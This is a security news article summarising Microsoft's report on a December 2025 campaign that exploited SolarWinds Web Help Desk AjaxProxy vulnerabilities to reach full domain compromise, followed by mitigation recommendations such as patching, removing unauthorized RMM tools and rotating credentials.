Microsoft has reported that a multi-stage intrusion campaign targeting internet-accessible SolarWinds Web Help Desk (WHD) instances for initial access may have exploited recently patched vulnerabilities before fixes were available. The sophisticated attacks, which took place in December 2025, saw threat actors compromise vulnerable WHD deployments to spawn PowerShell commands, ultimately downloading and executing additional malicious payloads. This activity highlights a critical and recurring security challenge where a single exposed application can serve as the gateway for a complete domain compromise, particularly when vulnerabilities remain unpatched or are inadequately monitored by security teams. The uncertainty surrounding the exact exploit used underscores the complexity of incident response when multiple critical flaws exist on a system simultaneously.
1. The Anatomy of the Attack
The investigation into the December 2025 intrusions revealed a complex scenario where multiple critical vulnerabilities were present on the compromised SolarWinds WHD instances, making precise attribution of the initial access vector difficult. At the time of the attacks, the targeted systems were vulnerable to a new set of flaws, specifically CVE-2025-40551 and CVE-2025-40536, which were not patched until January 2026. This timeline strongly suggests the possibility of a zero-day exploit. However, the same systems were also susceptible to an older vulnerability, CVE-2025-26399, which was addressed in September 2025. The core of the issue lies within a flawed component known as AjaxProxy. CVE-2025-26399 is an unauthenticated remote code execution (RCE) bug that bypasses a previous patch. Similarly, CVE-2025-40551, which was recently added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, is an untrusted data deserialization issue also rooted in the AjaxProxy functionality. Compounding this, CVE-2025-40536 is a security control bypass that could enable an attacker to create valid AjaxProxy instances, paving the way to exploit the RCE flaw. Because the attacks occurred when systems were vulnerable to both the old and new CVEs, Microsoft stated it could not “reliably confirm the exact CVE used to gain an initial foothold.”
Once initial access was established, the threat actors demonstrated a clear focus on stealth and persistence, employing a variety of sophisticated techniques to embed themselves within the compromised networks. A key element of their post-exploitation strategy involved the deployment of legitimate remote monitoring and management (RMM) software, specifically ManageEngine, to maintain persistent access. This “living-off-the-land” approach allows attackers to blend in with normal administrative activities, making their presence harder to detect. To further solidify their control, they established reverse SSH and RDP access, creating resilient backdoors into the environment. In a particularly evasive maneuver, the attackers set up a scheduled task designed to launch a QEMU virtual machine at system startup with the highest privileges. This virtualized environment was likely used for further evasion and to establish secure SSH access via port forwarding, isolating their malicious activities from the host operating system’s security monitoring tools. This heavy reliance on legitimate administrative tools and low-noise persistence mechanisms illustrates a high level of operational security on the part of the attackers.
2. Post-Exploitation and Mitigation Strategies
Following the establishment of a persistent foothold, the attackers escalated their privileges and moved laterally across the network to achieve their ultimate objective: full domain compromise. Their methods for credential harvesting were both classic and effective. In some observed instances, they utilized a technique known as DLL sideloading to illegitimately access the memory of the Local Security Authority Subsystem Service (LSASS) process, a common target for dumping credentials. After obtaining high-privilege credentials, the attackers executed a DCSync attack. This powerful technique involves impersonating a domain controller and requesting password data from a legitimate domain controller, effectively giving them access to the keys to the entire kingdom without needing to install malware on the domain controller itself. The successful execution of this attack pattern—from exploiting an external service to achieving domain dominance—serves as a stark reminder of how quickly a localized breach can escalate into a full-blown organizational crisis.
In light of these events, Microsoft has issued urgent recommendations for organizations utilizing SolarWinds Web Help Desk. The primary and most critical step is to immediately apply the patches for all aformentioned vulnerabilities, especially CVE-2025-40551, CVE-2025-40536, and CVE-2025-26399, to close the initial access vector. Beyond patching, a thorough hunt for signs of compromise is imperative. Security teams should actively scan their environments for any unauthorized RMM applications, like the ManageEngine tool used in this campaign, and promptly remove them. A comprehensive credential rotation for all accounts, particularly those with administrative privileges, should be conducted to invalidate any credentials that may have been stolen. Furthermore, any hosts that are identified as potentially compromised must be isolated from the network immediately to prevent further lateral movement by the attackers. These response actions are crucial for containing the threat and remediating the damage caused by the intrusion.
A Blueprint for Future Defense
The detailed analysis of this campaign provided a clear blueprint of an adversary’s tactics, which heavily favored stealth and the use of legitimate system tools over noisy, custom malware. The attackers’ reliance on living-off-the-land techniques, combined with the deployment of standard RMM software and low-impact persistence mechanisms, demonstrated a sophisticated understanding of how to evade typical security defenses. This incident served as a critical case study, reinforcing the principle that a single, unpatched, internet-facing application could provide a direct path to a complete network takeover. The successful compromise underscored the necessity for robust vulnerability management, continuous monitoring of network endpoints, and a security posture that assumed a breach was not a matter of if, but when. Organizations were reminded that proactive defense required more than just patching; it demanded a deep understanding of attacker methodologies to better anticipate and counter their moves.
